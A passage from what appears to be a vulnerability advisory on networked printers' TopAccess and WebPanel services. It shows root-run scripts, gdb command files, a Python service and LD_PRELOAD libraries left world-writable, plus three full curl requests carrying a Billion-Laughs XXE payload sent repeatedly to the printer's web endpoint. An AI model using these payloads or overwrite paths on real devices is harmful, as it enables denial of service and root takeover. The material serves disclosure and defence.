\/registration\/al\/WebPanel\/<br \/>total 2632<br \/>drwxrwxrwx 7 root root 4096 Dec 6 03:33 .<br \/>drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..<br \/>-rwxrwxrwx 1 root root 2642944 Dec 6 03:33 HomeBackgroundImages.tar.gz<br \/>-rwxrwxrwx 1 root root 857 Dec 6 03:33 Makefile<br \/>-rwxrwxrwx 1 root root 909 Dec 6 03:33 config.rb<br \/>-rwxrwxrwx 1 root root 1103 Dec 6 03:33 development.ini<br \/>drwxrwxrwx 4 root root 4096 Jan 22 2015 predefinedxml<br \/>-rwxrwxrwx 1 root root 199 Dec 6 03:33 pyramid.wsgi<br \/>drwxrwxrwx 3 root root 4096 Dec 6 03:33 statuspages<br \/>drwxrwxrwx 14 root root 4096 Dec 6 03:33 wpclient<br \/>drwxrwxrwx 6 root root 4096 Mar 14 16:32 wpserver<br \/>drwxrwxrwx 2 root root 4096 Dec 6 03:33 wpserver.egg-info<br \/>bash-4.1# ls -la \/registration\/al\/WebPanel\/development.ini<br \/>-rwxrwxrwx 1 root root 1103 Dec 6 03:33<br \/>\/registration\/al\/WebPanel\/development.ini<\/p>\n<p>bash-4.1# ls -la \/registration\/al\/TopAccessPy<br \/>total 36<br \/>drwxrwxrwx 5 root root 4096 Dec 6 03:39 .<br \/>drwxrwxrwx 19 root root 4096 Mar 14 16:28 ..<br \/>-rwxrwxrwx 1 root root 315 Dec 6 03:39 Makefile<br \/>-rwxrwxrwx 1 root root 2091 Dec 6 03:39 TA_CacheScript.sh<br \/>drwxrwxrwx 7 root root 4096 Mar 23 10:37 client<br \/>-rwxrwxrwx 1 root root 1078 Dec 6 03:39 development.ini<br \/>-rwxrwxrwx 1 root root 202 Dec 6 03:39 pyramid.wsgi<br \/>drwxrwxrwx 6 root root 4096 Mar 14 16:32 server<br \/>drwxrwxrwx 2 root root 4096 Dec 6 03:39 server.egg-info<br \/>bash-4.1# ls -la \/registration\/al\/TopAccessPy\/development.ini<br \/>-rwxrwxrwx 1 root root 1078 Dec 6 03:39<br \/>\/registration\/al\/TopAccessPy\/development.ini<\/p>\n<p>These scripts can be overwritten to include specific commands to be executed:<\/p>\n<p>Content of `\/registration\/al\/TopAccessPy\/development.ini`:<\/p>\n<p>bash-4.1# cat \/registration\/al\/TopAccessPy\/development.ini<br \/>[app:main]use = egg:server<\/p>\n<p>pyramid.reload_templates = true<br \/>pyramid.debug_authorization = false<br \/>pyramid.debug_notfound = false<br \/>pyramid.debug_routematch = false<br \/>pyramid.default_locale_name = en<br \/>pyramid.includes = pyramid_tm<\/p>\n[server:main]\n<p># Begin logging configuration<\/p>\n[loggers]keys = root, server<\/p>\n[handlers]keys = console, serverhandler<\/p>\n[formatters]keys = generic, serverformatter<\/p>\n[logger_root]level = DEBUG<br \/>handlers = console<\/p>\n[logger_server]level=DEBUG<br \/>handlers=serverhandler<br \/>qualname=server<br \/>propagate=0<\/p>\n[handler_console]class = StreamHandler<br \/>args = (sys.stderr,)<br \/>level = NOTSET<br \/>formatter = generic<\/p>\n[handler_serverhandler]class=logging.handlers.RotatingFileHandler<br \/>level=DEBUG<br \/>formatter=serverformatter<br \/>args=(&#8216;\/work\/log\/al\/webpanel\/python_ta.log&#8217;,&#8217;a&#8217;,(5*1024*1024),3)<\/p>\n[formatter_generic]format = %(asctime)s %(levelname)-5.5s [%(name)s][%(threadName)s]%(message)s<\/p>\n[formatter_serverformatter]format=%(asctime)s%(msecs)03d Pid= %(process)d Tid= %(thread)d<br \/>%(filename)s %(lineno)d %(levelname)s %(message)s<br \/>datefmt=%m\/%d %H:%M:%S<\/p>\n<p># End logging configuration<\/p>\n<p>### Remote Code Execution &#8211; Upload of a malicious script<br \/>`\/tmp\/backtraceScript.sh` and injection of malicious gdb commands<\/p>\n<p>When a program crashes, the `\/tmp\/backtraceScript.sh` script will be<br \/>executed as root as shown below:<\/p>\n<p>2023\/05\/27 19:48:02 CMD: UID=0 PID=22535 | sh -c<br \/>\/tmp\/backtraceScript.sh<br \/>&#8220;\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080&#8221; &gt;<br \/>&#8220;\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080&#8243;_backtrace<br \/>2023\/05\/27 19:48:02 CMD: UID=0 PID=22536 | \/bin\/bash<br \/>\/tmp\/backtraceScript.sh<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080<br \/>2023\/05\/27 19:48:02 CMD: UID=0 PID=22540 | \/bin\/bash<br \/>\/tmp\/backtraceScript.sh<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080<br \/>2023\/05\/27 19:48:02 CMD: UID=0 PID=22539 | \/bin\/bash<br \/>\/tmp\/backtraceScript.sh<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080<br \/>2023\/05\/27 19:48:02 CMD: UID=0 PID=22538 | \/bin\/bash<br \/>\/tmp\/backtraceScript.sh<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080<br \/>2023\/05\/27 19:48:02 CMD: UID=0 PID=22537 | \/bin\/bash<br \/>\/tmp\/backtraceScript.sh<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080<br \/>2023\/05\/27 19:48:03 CMD: UID=0 PID=22541 | gdb -c<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080 -x<br \/>\/tmp\/gdb_commands.txt<br \/>2023\/05\/27 19:48:03 CMD: UID=0 PID=22542 | gdb<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker<br \/>\/work\/log\/corefiles\/core.httpd_worker.8272.MFP14130119.1681135080<br \/>&#8211;batch &#8211;command=\/tmp\/gdb_commands.txt<br \/>2023\/05\/27 19:48:03 CMD: UID=0 PID=22543 | iconv -l<\/p>\n<p>This script has insecure permissions (777) and will run gdb as root:<\/p>\n<p>Content of `\/tmp\/backtraceScript.sh`:<\/p>\n<p>bash-4.1# ls -la \/tmp\/backtraceScript.sh<br \/>-rwxrwxrwx 1 root root 1457 Apr 6 2016 \/tmp\/backtraceScript.sh<br \/>bash-4.1# cat \/tmp\/backtraceScript.sh<br \/>#!\/bin\/bash<br \/>OIFS=${IFS}<br \/>IFS=$&#8217;\\n&#8217;<br \/>echo &#8220;quit&#8221; &gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;quit&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>EXE_NAME=`gdb -c &#8220;$1&#8221; -x \/tmp\/gdb_commands.txt | grep &#8220;Core was<br \/>generated by&#8221; | cut -d&#8217;\\`&#8217; -f2 | cut -d&#8217; &#8216; -f1`<br \/>echo &#8220;thread apply all backtrace full&#8221; &gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;set print asm&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;set print demangle on&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;disassemble&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;info reg&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;quit&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>echo &#8220;quit&#8221; &gt;&gt; \/tmp\/gdb_commands.txt<br \/>if [ &#8220;$EXE_NAME&#8221; = &#8220;&#8221; ];then<br \/>if [ -d \/work\/log\/platform\/syscallerr\/core_files ];then<br \/>mv &#8220;$1&#8221; \/work\/log\/platform\/syscallerr\/core_files\/<br \/>else<br \/>mkdir -p \/work\/log\/platform\/syscallerr\/core_files<br \/>mv &#8220;$1&#8221; \/work\/log\/platform\/syscallerr\/core_files\/<br \/>fi<br \/>else<br \/>if [ -f $EXE_NAME ];then<br \/>gdb $EXE_NAME &#8220;$1&#8221; &#8211;batch &#8211;command=\/tmp\/gdb_commands.txt 2&gt;&amp;1<br \/>elif [ -f $EB2\/bin\/$EXE_NAME ]; then<br \/>gdb $EB2\/bin\/$EXE_NAME &#8220;$1&#8221; &#8211;batch &#8211;command=\/tmp\/gdb_commands.txt 2&gt;&amp;1<br \/>elif [ &#8220;$EXE_NAME&#8221;=&#8221;(wsgi:webapi)&#8221; -o<br \/>&#8220;$EXE_NAME&#8221;=&#8221;(wsgi:webpanel)&#8221; -o &#8220;$EXE_NAME&#8221;=&#8221;(wsgi:topaccesspy)&#8221; ];<br \/>then<br \/>EXE_NAME=\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker<br \/>gdb $EXE_NAME &#8220;$1&#8221; &#8211;batch &#8211;command=\/tmp\/gdb_commands.txt 2&gt;&amp;1<br \/>else<br \/>if [ -d \/work\/log\/platform\/syscallerr\/core_files ];then<br \/>mv &#8220;$1&#8221; \/work\/log\/platform\/syscallerr\/core_files\/<br \/>else<br \/>mkdir -p \/work\/log\/platform\/syscallerr\/core_files<br \/>mv &#8220;$1&#8221; \/work\/log\/platform\/syscallerr\/core_files\/<br \/>fi<br \/>fi<br \/>fi<br \/>IFS=${OIFS}<br \/>bash-4.1#<\/p>\n<p>The `\/tmp\/gdb_commands.txt` gdb script (used by gdb in the<br \/>`\/tmp\/backtraceScript.sh` script) can be also overwritten by an<br \/>attacker to contain gdb commands and get Remote Code Execution.<\/p>\n<p>An attacker can change the `\/tmp\/backtraceScript.sh` to get Remote<br \/>Code Execution.<\/p>\n<p>An attacker can change the `\/tmp\/gdb_commands.txt` script to get<br \/>Remote Code Execution.<\/p>\n<p>### Remote Code Execution &#8211; Upload of a malicious<br \/>`\/home\/SYSROM_SRC\/build\/common\/bin\/sapphost.py` program<\/p>\n<p>The program `\/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py` runs as<br \/>root when the printer starts:<\/p>\n<p>bash-4.1# ps auxww|grep python<br \/>root 3984 5.0 5.3 200160 70944 ? Sl 18:49 0:03<br \/>python \/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py<br \/>10000000-0000-0000-0000-500000000000<br \/>root 4597 4.5 3.5 144312 47740 ? Sl 18:49 0:02<br \/>python \/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py<br \/>10000000-0000-0000-0000-500000000001<br \/>root 5193 0.0 0.1 12616 1852 ? S 18:50 0:00 grep python<br \/>bash-4.1#<\/p>\n<p>`\/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py` is a symbolic link to<br \/>`\/home\/SYSROM_SRC\/build\/common\/bin\/sapphost.py` and this Python<br \/>program has insecure permissions, allowing any local user or any<br \/>remote attacker leveraging the insecure file upload vulnerability to<br \/>overwrite it:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py<br \/>lrwxrwxrwx 1 root root 32 Mar 15 11:44<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/sapphost.py -&gt;<br \/>..\/..\/thirdparty\/bin\/sapphost.py<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/sapphost.py<br \/>lrwxrwxrwx 1 root root 28 Mar 15 11:44<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/sapphost.py -&gt;<br \/>..\/..\/common\/bin\/sapphost.py<br \/>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/common\/bin\/sapphost.py<br \/>-rwxrwxrwx 1 root root 2124 Oct 12 2021<br \/>\/home\/SYSROM_SRC\/build\/common\/bin\/sapphost.py<\/p>\n<p>An attacker can overwrite this Python code to get Remote Code<br \/>Execution when the printer starts.<\/p>\n<p>### Remote Code Execution &#8211; Upload of malicious libraries<\/p>\n<p>When analyzing the processes running in the printers, it appears the<br \/>`LD_PRELOAD` variable is used to load specific shared libraries:<\/p>\n<p>&#8211; &#8211; `\/ramdisk\/al\/libGetNameInfoInterface.so`<br \/>&#8211; &#8211; `\/ramdisk\/al\/libGetAddtInfoInterface.so`<\/p>\n<p>We can find the `LD_PRELOAD` variable set by default in programs<br \/>running in the printers:<\/p>\n<p>bash-4.1# printenv | grep LD_PRELO<br \/>LD_PRELOAD=\/ramdisk\/al\/libGetNameInfoInterface.so:\/ramdisk\/al\/libGetAddtInfoInterface.so:<br \/>bash-4.1# ls -la \/ramdisk\/al\/libGetNameInfoInterface.so<br \/>-rwxrwxrwx 1 root root 70813 Dec 6 02:02<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>bash-4.1# s -la \/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>-rwxrwxrwx 1 root root 87311 Dec 6 02:02<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>bash-4.1#<\/p>\n<p>For example, when sending 55 HTTP requests to the printers, new Apache<br \/>processes running as root will be created on the fly by the printer,<br \/>as shown below. These new processes will load and execute code from<br \/>`libGetNameInfoInterface.so` and `libGetAddtInfoInterface.so`. An<br \/>attacker can rewrite any file over them to get Remote Code Execution.<\/p>\n<p>Using the HTTP request from the Pre-authenticated Blind XML External<br \/>Entity (XXE) injection &#8211; DoS, we will send 55 HTTP requests (only the<br \/>last 3 are displayed) containing the Billion-Laugh Attack, to create<br \/>new Apache processes in the remote printer:<\/p>\n<p>kali% curl -i -s -k -X $&#8217;POST&#8217; \\<br \/>-H $&#8217;Host: 10.0.0.1:8080&#8242; -H $&#8217;User-Agent: Mozilla\/5.0 (X11;<br \/>Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0&#8242; -H $&#8217;Accept:<br \/>*\/*&#8217; -H $&#8217;Accept-Language: en-US,en;q=0.5&#8242; -H $&#8217;Accept-Encoding: gzip,<br \/>deflate&#8217; -H $&#8217;Cache-Control: no-cache&#8217; -H $&#8217;Pragma: no-cache&#8217; -H<br \/>$&#8217;Content-Type: text\/plain; charset=utf-8&#8242; -H $&#8217;csrfpId:<br \/>10.0.0.1.852d519a6fa9825fae857bac5c003da0&#8242; -H $&#8217;Content-Length: 760&#8242;<br \/>-H $&#8217;Origin: http:\/\/10.0.0.1:8080&#8242; -H $&#8217;Connection: close&#8217; -H<br \/>$&#8217;Referer: http:\/\/10.0.0.1:8080\/?MAIN=TOPACCESS&#8217; \\<br \/>-b $&#8217;Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0;<br \/>Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT&#8217; \\<br \/>&#8211;data-binary $'&lt;!DOCTYPE lolz [\\x0d\\x0a &lt;!ENTITY lol<br \/>\\&#8221;lol\\&#8221;&gt;\\x0d\\x0a &lt;!ELEMENT lolz (#PCDATA)&gt;\\x0d\\x0a &lt;!ENTITY lol1<br \/>\\&#8221;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol2 \\&#8221;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol3 \\&#8221;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol4 \\&#8221;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol5 \\&#8221;&amp;lol4;&amp;lol4;&amp;lol4;\\&#8221;&gt;\\x0d\\x0a &lt;!ENTITY lol6<br \/>\\&#8221;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol7 \\&#8221;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol8 \\&#8221;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol9 \\&#8221;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;\\&#8221;&gt;\\x0d\\x0a]&gt;\\x0d\\x0a&lt;lolz&gt;&amp;lol9;&lt;\/lolz&gt;&#8217;<br \/>\\<br \/>$&#8217;http:\/\/10.0.0.1:8080\/contentwebserver&#8217; &amp;<br \/>[53] 2286190<\/p>\n<p>kali% curl -i -s -k -X $&#8217;POST&#8217; \\<br \/>-H $&#8217;Host: 10.0.0.1:8080&#8242; -H $&#8217;User-Agent: Mozilla\/5.0 (X11;<br \/>Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0&#8242; -H $&#8217;Accept:<br \/>*\/*&#8217; -H $&#8217;Accept-Language: en-US,en;q=0.5&#8242; -H $&#8217;Accept-Encoding: gzip,<br \/>deflate&#8217; -H $&#8217;Cache-Control: no-cache&#8217; -H $&#8217;Pragma: no-cache&#8217; -H<br \/>$&#8217;Content-Type: text\/plain; charset=utf-8&#8242; -H $&#8217;csrfpId:<br \/>10.0.0.1.852d519a6fa9825fae857bac5c003da0&#8242; -H $&#8217;Content-Length: 760&#8242;<br \/>-H $&#8217;Origin: http:\/\/10.0.0.1:8080&#8242; -H $&#8217;Connection: close&#8217; -H<br \/>$&#8217;Referer: http:\/\/10.0.0.1:8080\/?MAIN=TOPACCESS&#8217; \\<br \/>-b $&#8217;Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0;<br \/>Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT&#8217; \\<br \/>&#8211;data-binary $'&lt;!DOCTYPE lolz [\\x0d\\x0a &lt;!ENTITY lol<br \/>\\&#8221;lol\\&#8221;&gt;\\x0d\\x0a &lt;!ELEMENT lolz (#PCDATA)&gt;\\x0d\\x0a &lt;!ENTITY lol1<br \/>\\&#8221;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol2 \\&#8221;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol3 \\&#8221;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol4 \\&#8221;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol5 \\&#8221;&amp;lol4;&amp;lol4;&amp;lol4;\\&#8221;&gt;\\x0d\\x0a &lt;!ENTITY lol6<br \/>\\&#8221;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol7 \\&#8221;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol8 \\&#8221;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol9 \\&#8221;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;\\&#8221;&gt;\\x0d\\x0a]&gt;\\x0d\\x0a&lt;lolz&gt;&amp;lol9;&lt;\/lolz&gt;&#8217;<br \/>\\<br \/>$&#8217;http:\/\/10.0.0.1:8080\/contentwebserver&#8217; &amp;<br \/>[54] 2286192<\/p>\n<p>kali% curl -i -s -k -X $&#8217;POST&#8217; \\<br \/>-H $&#8217;Host: 10.0.0.1:8080&#8242; -H $&#8217;User-Agent: Mozilla\/5.0 (X11;<br \/>Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0&#8242; -H $&#8217;Accept:<br \/>*\/*&#8217; -H $&#8217;Accept-Language: en-US,en;q=0.5&#8242; -H $&#8217;Accept-Encoding: gzip,<br \/>deflate&#8217; -H $&#8217;Cache-Control: no-cache&#8217; -H $&#8217;Pragma: no-cache&#8217; -H<br \/>$&#8217;Content-Type: text\/plain; charset=utf-8&#8242; -H $&#8217;csrfpId:<br \/>10.0.0.1.852d519a6fa9825fae857bac5c003da0&#8242; -H $&#8217;Content-Length: 760&#8242;<br \/>-H $&#8217;Origin: http:\/\/10.0.0.1:8080&#8242; -H $&#8217;Connection: close&#8217; -H<br \/>$&#8217;Referer: http:\/\/10.0.0.1:8080\/?MAIN=TOPACCESS&#8217; \\<br \/>-b $&#8217;Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0;<br \/>Locale=en-US,en#q=0.5; BrowserLang=en_US;<br \/>pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT&#8217; \\<br \/>&#8211;data-binary $'&lt;!DOCTYPE lolz [\\x0d\\x0a &lt;!ENTITY lol<br \/>\\&#8221;lol\\&#8221;&gt;\\x0d\\x0a &lt;!ELEMENT lolz (#PCDATA)&gt;\\x0d\\x0a &lt;!ENTITY lol1<br \/>\\&#8221;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;&amp;lol;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol2 \\&#8221;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;&amp;lol1;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol3 \\&#8221;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;&amp;lol2;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol4 \\&#8221;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;&amp;lol3;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol5 \\&#8221;&amp;lol4;&amp;lol4;&amp;lol4;\\&#8221;&gt;\\x0d\\x0a &lt;!ENTITY lol6<br \/>\\&#8221;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;&amp;lol5;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol7 \\&#8221;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;&amp;lol6;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol8 \\&#8221;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;&amp;lol7;\\&#8221;&gt;\\x0d\\x0a<br \/>&lt;!ENTITY lol9 \\&#8221;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;&amp;lol8;\\&#8221;&gt;\\x0d\\x0a]&gt;\\x0d\\x0a&lt;lolz&gt;&amp;lol9;&lt;\/lolz&gt;&#8217;<br \/>\\<br \/>$&#8217;http:\/\/10.0.0.1:8080\/contentwebserver&#8217; &amp;<br \/>[55] 2286194<\/p>\n<p>We can find that new Apache processes are created using `LD_PRELOAD`<br \/>variables on the remote printer:<\/p>\n<p>2023\/05\/27 11:31:42 CMD: UID=0 PID=4132 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:42 CMD: UID=0 PID=4131 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:42 CMD: UID=0 PID=4130 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:42 CMD: UID=0 PID=4129 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4138 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4137 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4136 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4135 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4134 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4133 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4139 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:43 CMD: UID=0 PID=4140 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:44 CMD: UID=0 PID=4141 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 11:31:44 CMD: UID=0 PID=4142 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 11:31:45 CMD: UID=0 PID=4143 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:46 CMD: UID=0 PID=4145 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:46 CMD: UID=0 PID=4144 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:47 CMD: UID=0 PID=4146 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 11:31:47 CMD: UID=0 PID=4147 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 11:31:47 CMD: UID=0 PID=4151 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:47 CMD: UID=0 PID=4150 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br \/>2023\/05\/27 11:31:47 CMD: UID=0 PID=4149 |<br \/>\/usr\/local\/ebx\/bin\/httpd -f \/encryption\/al\/network\/config\/httpd.conf<br \/>-k start<br 